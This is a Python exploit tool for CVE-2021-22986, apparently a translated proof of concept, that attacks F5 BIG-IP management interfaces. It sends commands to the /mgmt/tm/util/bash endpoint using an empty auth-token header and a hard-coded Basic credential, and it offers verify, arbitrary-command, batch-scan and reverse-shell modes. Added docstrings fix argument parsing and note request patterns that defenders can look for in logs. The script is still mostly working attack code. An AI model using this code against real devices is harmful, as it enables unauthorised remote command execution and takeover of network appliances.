Created
September 28, 2021 17:04
translated version of https://github.com/Al1ex/CVE-2021-22986
import requests | |
import json | |
import sys | |
import argparse | |
import re | |
import json | |
import time | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
# Every request in this file is sent with verify=False, so TLS certificates are
# never validated; this call only hides the resulting urllib3 warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Unix timestamp taken at import time; no function shown in this file reads it.
t = int(time.time())
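def title():
    """Print the ASCII-art banner followed by the command-line usage summary.

    The banner is held in a raw string. The art is full of backslashes that a
    normal literal would parse as invalid escape sequences, and one art row,
    as it appears in this listing, ends in a backslash, which a normal
    literal would treat as a line continuation and so drop the newline.
    """
    banner = r'''
______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __
/ |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / /
| ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_
| | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \
| `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) |
\______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/
Author:Al1ex@Heptagram
Github:https://github.com/Al1ex
'''
    # One line per mode; the mode switches are parsed in main().
    usage = '''
Authentication mode: python CVE_2021_22986.py -v true -u target_url
Attack mode: python CVE_2021_22986.py -a true -u target_url -c command
Batch detection: python CVE_2021_22986.py -s true -f file
Rebound mode: python CVE_2021_22986.py -r true -u target_url -c command
'''
    print(banner)
    print(usage)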
def check(target_url):
    """Send one fixed request to the target and print a verdict line.

    The request is a POST to ``/mgmt/tm/util/bash`` asking the endpoint to run
    ``id``. It carries an empty ``X-F5-Auth-Token`` header and a hard-coded
    ``Authorization: Basic`` value. A 200 response whose body contains
    ``commandResult`` is reported as vulnerable, any other response as not
    vulnerable, and any exception as an access error.

    Notes for anyone relying on the verdict:

    * "Not Vulnerable" only means this single request did not come back as a
      200 with a command result. A proxy, filter or error page in front of
      the device yields the same line, so it is not proof of a patched host.
    * ``verify=False`` turns certificate validation off, so the identity of
      the answering host is not checked.
    * The request shape visible here (this path together with an empty
      ``X-F5-Auth-Token`` header) is a concrete pattern to search for in
      management-interface request logs, where headers are recorded.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M=',
    }
    payload = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        reply = requests.post(url=endpoint, json=payload, headers=request_headers, verify=False, timeout=5)
        answered = reply.status_code == 200 and 'commandResult' in reply.text
        verdict = "[+] Target {} Is Vulnerable" if answered else "[-] Target {} Not Vulnerable"
        print(verdict.format(target_url))
    except Exception:
        # Timeouts, DNS failures and TLS errors all end up here and are
        # reported identically; the underlying error is not shown.
        print('[x] Url Access exception {0}'.format(target_url))
def attack(target_url, cmd):
    """POST a caller-supplied command to the target and print the returned output.

    The request has the same shape as the one used for verification: a POST
    to ``/mgmt/tm/util/bash`` with an empty ``X-F5-Auth-Token`` header and a
    fixed ``Authorization: Basic`` value. *cmd* is inserted verbatim between
    single quotes in the ``utilCmdArgs`` field of the JSON body. When the
    reply is a 200 containing ``commandResult``, that field is parsed out of
    the JSON body and printed.

    For incident review, the ``utilCmdArgs`` value in a captured request body
    is where the executed command appears. ``verify=False`` means the server
    certificate is not validated.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M=',
    }
    payload = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        reply = requests.post(url=endpoint, json=payload, headers=request_headers, verify=False, timeout=5)
        if reply.status_code != 200 or 'commandResult' not in reply.text:
            print("[-] Target {} has no loopholes".format(target_url))
        else:
            output = json.loads(reply.text)['commandResult']
            print("[+] Target {} has a loophole".format(target_url))
            print('[+] The response is: {0}'.format(output))
    except Exception:
        # Network errors and malformed JSON are both reported with this one line.
        print('url Access exception {0}'.format(target_url))
def reverse_shell(target_url, command):
    """POST a caller-supplied command to the target without reading the reply.

    The request is a POST to ``/mgmt/tm/util/bash`` with an empty
    ``X-F5-Auth-Token`` header, a fixed ``Authorization: Basic`` value and
    *command* placed verbatim between single quotes in ``utilCmdArgs``.
    The response is discarded. Nothing is printed when the request completes;
    the only message comes from the exception path.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M=',
    }
    payload = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
    try:
        requests.post(url=endpoint, json=payload, headers=request_headers, verify=False, timeout=5)
    except Exception:
        # NOTE(review): despite the "[+]" prefix this line is printed for any
        # failure (timeout, refused connection, TLS error), not on success.
        print("[+] Please check to see if you bounce the shell back")
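def scan(file):
    """Run check() on every non-blank line of a UTF-8 text file.

    Each line is stripped, passed through format_url() and handed to check(),
    which prints one verdict line per entry.

    Args:
        file: Path of the list file, one host or URL per line.
    """
    # The original iterated over a bare open() and never closed the handle;
    # the context manager releases it even if a check raises.
    with open(file, 'r', encoding='utf-8') as targets:
        for raw_line in targets:
            entry = raw_line.strip()
            if entry != '':
                check(format_url(entry))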
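def format_url(url):
    """Return *url* trimmed, with ``https://`` prepended when it has no http(s) scheme.

    Whitespace is stripped before the scheme test. The original tested the
    first four characters of the untrimmed value, so an entry with leading
    whitespace received a second scheme, and a host name that merely begins
    with "http" was returned without any scheme.

    Args:
        url: Host name or URL as text.

    Returns:
        The normalised URL, or None (after printing an error line) when *url*
        is not a string.
    """
    try:
        cleaned = url.strip()
        # Compare case-insensitively against the full scheme prefix, not just "http".
        if not cleaned.lower().startswith(("http://", "https://")):
            cleaned = "https://" + cleaned
        return cleaned
    except (AttributeError, TypeError):
        print('URL Error {0}'.format(url))
        return None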
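def _as_flag(value):
    """Interpret a command-line string as an on/off switch."""
    return str(value).strip().lower() not in ("", "0", "false", "no", "off")


def main():
    """Parse the command line and run exactly one mode.

    The mode switches (-v, -a, -s, -r) each take a value. The original
    declared them with ``type=bool``, which turns every non-empty string,
    including "false", into True, so ``-a false`` still ran attack mode.
    They are now parsed with _as_flag(), which keeps "true" working and
    treats "false", "0", "no", "off" and blank values as off.

    Modes are tested in a fixed order (verify, attack, scan, shell) and only
    the first match runs. When no mode matches, the process exits with
    status 0 and prints nothing.
    """
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=_as_flag, help=' Verification mode ')
    parser.add_argument('-u', '--url', type=str, help='Target URL ')
    parser.add_argument('-a', '--attack', type=_as_flag, help=' Attack mode ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' Excuting an order ')
    parser.add_argument('-s', '--scan', type=_as_flag, help=' Batch mode ')
    parser.add_argument('-f', '--file', type=str, help=' file path ')
    parser.add_argument('-r', '--shell', type=_as_flag, help=' Reverse shell mode ')
    args = parser.parse_args()

    url = args.url
    command = args.command
    file = args.file

    # A switch that was not given stays None, so "is True" is False for it.
    if args.verify is True and url is not None:
        check(url)
    elif args.attack is True and url is not None and command is not None:
        attack(url, command)
    elif args.scan is True and file is not None:
        scan(file)
    elif args.shell is True and url is not None and command is not None:
        reverse_shell(url, command)
    else:
        sys.exit(0)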
# Script entry point: print the banner and usage text, then parse the
# arguments and dispatch to one mode.
if __name__ == '__main__':
    title()
    main()